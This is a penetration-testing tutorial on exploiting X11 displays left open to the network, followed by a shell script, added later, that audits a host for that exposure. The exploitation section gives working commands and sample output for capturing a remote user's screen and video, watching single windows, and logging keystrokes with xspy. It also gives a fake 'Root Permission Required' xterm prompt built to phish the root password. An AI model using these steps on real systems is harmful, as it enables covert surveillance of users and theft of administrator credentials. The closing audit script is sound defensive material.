Open X11 Server Exploitation

What is X Server?  X11 is the graphical display engine for Linux.  More information can, naturally, be found at http://en.wikipedia.org/wiki/X_Window_System.  Gnome and KDE are two typical interfaces that run on top of X11.  We will be looking at an OPEN X11 server though, meaning that *anyone* can connect to it over the network without authentication.

References:

The Setup

Ubuntu

For Ubuntu 10.04, it took me a while to figure out how to even export X11.
Ubuntu now utilizes GDM, and according to this post, it only takes three steps:

  1. sudo nano /etc/gdm/gdm.schemas
  2. Find:
    <schema>
     <key>security/DisallowTCP</key>
     <signature>b</signature>
     <default>true</default>
    </schema>
    1. Set true to false
  3. logout or reboot
  4. Verification: sudo netstat -antp | grep 6000
    1. tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
  5. Now, to verify you allow ANYONE to get on x11, type: xhost +

For Ubuntu 12.04, we no longer use GDM (Gnome), but LightDM.
According to this post, it only takes three steps:

  1. sudo nano /etc/lightdm/lightdm.conf
  2. Under the [SeatDefaults] area, add:
    xserver-allow-tcp=true
    allow-guest=true
  3. logout or reboot
  4. Verification: sudo netstat -antp | grep 6000
    1. tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
  5. Now, to verify you allow ANYONE to get on x11, type: xhost +

Fedora

I used Fedora 15, and it is very similar to Ubuntu.  I used this source.
  1. vi /etc/gdm/custom.conf
  2. [security]
    DisallowTCP=false
  3. logout/reboot
  4. Now, to verify you allow ANYONE to get on x11, type: xhost +

Exploitation

So there are several things we can do with an open X11 server: view the video, monitor the keyboard, and a combination of both.

  1. View Screenshots
    1. The first thing we want to do is verify the connection is open and we can get to it:
      xdpyinfo -display <ip>:<display>
      1. We want to see this:
        root@bt:~# xdpyinfo -display 10.1.1.16:0 | less
        name of display:    10.1.1.16:0.0
        version number:    11.0
        vendor string:    Fedora Project
        vendor release number:    11002000
        maximum request size:  16777212 bytes
        motion buffer size:  256
        bitmap unit, bit order, padding:    32, LSBFirst, 32
        image byte order:    LSBFirst
        number of supported pixmap formats:    7
        supported pixmap formats:
            depth 1, bits_per_pixel 1, scanline_pad 32
            depth 4, bits_per_pixel 8, scanline_pad 32
            depth 8, bits_per_pixel 8, scanline_pad 32
            depth 15, bits_per_pixel 16, scanline_pad 32
            depth 16, bits_per_pixel 16, scanline_pad 32
            depth 24, bits_per_pixel 32, scanline_pad 32
            depth 32, bits_per_pixel 32, scanline_pad 32
        keycode range:    minimum 8, maximum 255
        .....<snip>
      2. We do NOT want to see this:
         xdpyinfo:  unable to open display "<ip>:<display>".
    2. We can now take a screenshot of their current display:
       xwd -root -display <ip>:<display> -out xdump.xdump
      1. To display this xdump file, we use the following command: display xdump.xdump
      2. Option 2 would be:
        xwud -in xdump.xdump
    3. We can also record video of the person doing what they are doing (Source): ffmpeg -f x11grab -s <resolution, e.g. 1280x1024> -r 25 -i <ip>:0.0 -sameq output.flv
  2. View Video of a specific window
    1. We will first use xwininfo to find out what windows there are on the screen to watch
      1. root@bt:~# xwininfo -tree -root -display 10.1.1.16:0
        
        xwininfo: Window id: 0x132 (the root window) (has no name)
        
          Root window id: 0x132 (the root window) (has no name)
          Parent window id: 0x0 (none)
             42 children:
             0x1e00007 "gnome-screensaver": ("gnome-screensaver" "Gnome-screensaver")  1024x768+0+0  +0+0
                1 child:
                0x1e00008 (has no name): ()  1x1+-1+-1  +-1+-1
             0x3200003 "Terminal": ()  10x10+-100+-100  +-100+-100
             0x3200001 "Terminal": ("gnome-terminal" "Gnome-terminal")  10x10+10+10  +10+10
                1 child:
                0x3200002 (has no name): ()  1x1+-1+-1  +9+9
             0x10002a3 "Panel": ("gnome-panel" "Gnome-panel")  256x249+235+221  +235+221
        ...<snip>
    2. Now we pick out one of those window IDs or window names to display.  We can use xwatchwin, which used to be included in Backtrack but isn't.  Luckily I have a backup here: xwatchwin
      1. ./xwatchwin 192.168.2.126:0 -w 0x3200004
  3. Monitor Keyboard
    1. Backtrack includes xspy in /pentest/sniffers/xspy/xspy.  I have a 7zip copy backed up here: xspy
    2. ./xspy -display <ip>:<display>
    3. Now just wait and watch the typing of the remote user!
    4. root@bt:~/Desktop/xspy# ./xspy -display 10.1.1.16:0
      this is some test typing from a user on an open X11 session!!!
  4. Advanced: Social Engineering
    1. Watching someone type is cool and all, but what we really want is to socially engineer them into giving us the password.  We can utilize xterm to pop open a display on the remote box.  With xspy monitoring the user input, we will be able to capture the password!
    2. First thing, is to start xspy, utilizing the previous command
    3. Open a display box for them:
      1. xterm -T "Root Permission Required" -display <ip>:<display> -e "echo -e -n 'root password: '; read passwd; echo 'Authentication Failure'; echo -e -n 'root password: '; read passwd"
        1. We ask twice, as we don’t want them to mess up.  Twice is always better!
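Everything in the Exploitation section works only because of the three changes made in the Setup section: the display manager is told to let X listen on TCP, port 6000 ends up bound to 0.0.0.0, and xhost + switches the host access list off. The audit script below is an added example and is not part of the original post or of any of the tools it mentions; it re-checks those three settings from the defender's side and lists remote clients that are already attached to the display, which is what an xspy or xwatchwin session looks like from the victim host. The function names are my own. The socket parsing assumes the column layout of netstat -antp / ss -tnp shown in the post (local address in column 4, peer in column 5), and the xhost check relies on the first line xhost prints when access control has been disabled. The sample outputs at the bottom are constructed; run the functions against live output of netstat, xhost and the display-manager config instead.

```shell
#!/bin/sh
# Added audit helper, not part of the original post. Each check reads
# captured command output from its first argument, so it can be fed the
# live output of `netstat -antp` / `ss -tnp`, `xhost`, and the display
# manager's config file, or the constructed samples at the bottom.

# Is an X server bound to a TCP display port (6000-6009) on an address
# other than loopback? Input: netstat -antp or ss -ltnp output.
x_listening_on_network() {
    printf '%s\n' "$1" | awk '
        /LISTEN/ {
            for (i = 1; i <= NF; i++)
                if ($i ~ /:600[0-9]$/ && $i !~ /^(127\.|\[::1\])/) found = 1
        }
        END { if (found) exit 0; exit 1 }'
}

# Does the display-manager config turn TCP listening on? Understands the
# LightDM key (xserver-allow-tcp=true), the GDM custom.conf key
# (DisallowTCP=false) and the gdm.schemas XML form used in the post.
# Commented-out lines (# or ;) are ignored.
dm_config_allows_tcp() {
    printf '%s\n' "$1" | awk '
        { gsub(/[ \t]/, ""); l = tolower($0) }
        l ~ /^[#;]/                                  { next }
        l ~ /^xserver-allow-tcp=true$/               { found = 1 }
        l ~ /^disallowtcp=false$/                    { found = 1 }
        l ~ /security\/disallowtcp/                  { inkey = 3 }
        inkey > 0 && l ~ /<default>false<\/default>/ { found = 1 }
        { if (inkey > 0) inkey-- }
        END { if (found) exit 0; exit 1 }'
}

# Has `xhost +` been run? xhost prints this first line when the
# host-based access list has been switched off entirely.
xhost_access_control_disabled() {
    printf '%s\n' "$1" | grep -q '^access control disabled'
}

# Print the peer address of every established connection to a display
# port that does not come from loopback. Input: netstat -antp / ss -tnp.
remote_x_clients() {
    printf '%s\n' "$1" | awk '
        /ESTAB/ && $4 ~ /:600[0-9]$/ && $5 !~ /^(127\.|\[::1\]|::1)/ { print $5 }'
}

# Run all checks and print one FINDING line per problem.
audit_x11() {
    sockets=$1; dmconf=$2; xhost_out=$3
    x_listening_on_network "$sockets" &&
        echo "FINDING: X server listens on a network-reachable TCP display port"
    dm_config_allows_tcp "$dmconf" &&
        echo "FINDING: display-manager config enables TCP listening for X"
    xhost_access_control_disabled "$xhost_out" &&
        echo "FINDING: xhost access control is disabled (any host may connect)"
    remote_x_clients "$sockets" | while read -r peer; do
        echo "FINDING: remote X client connected from $peer"
    done
    return 0
}

# Constructed samples: a host exposed the way the Setup section describes ...
OPEN_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      1806/X
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      900/cupsd
tcp        0      0 10.1.1.16:6000          10.1.1.5:51234          ESTABLISHED 1806/X
tcp        0      0 127.0.0.1:6000          127.0.0.1:40011         ESTABLISHED 1806/X'
OPEN_LIGHTDM='[SeatDefaults]
greeter-session=unity-greeter
#xserver-allow-tcp=false
xserver-allow-tcp=true
allow-guest=true'
OPEN_XHOST='access control disabled, clients can connect from any host'

# ... and the same host with TCP listening off and the access list restored.
HARDENED_NETSTAT='tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      900/cupsd'
HARDENED_LIGHTDM='[SeatDefaults]
xserver-allow-tcp=false'
HARDENED_XHOST='access control enabled, only authorized clients can connect
SI:localuser:alice'

echo "== exposed host =="
audit_x11 "$OPEN_NETSTAT" "$OPEN_LIGHTDM" "$OPEN_XHOST"
echo "== hardened host =="
audit_x11 "$HARDENED_NETSTAT" "$HARDENED_LIGHTDM" "$HARDENED_XHOST"
```

On the exposed sample the script reports four findings (network listener, permissive config, disabled access control, and the 10.1.1.5 client attached to the display); on the hardened sample it reports none. The loopback connection to 127.0.0.1:6000 is deliberately not flagged, since local clients talking to their own display are normal.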
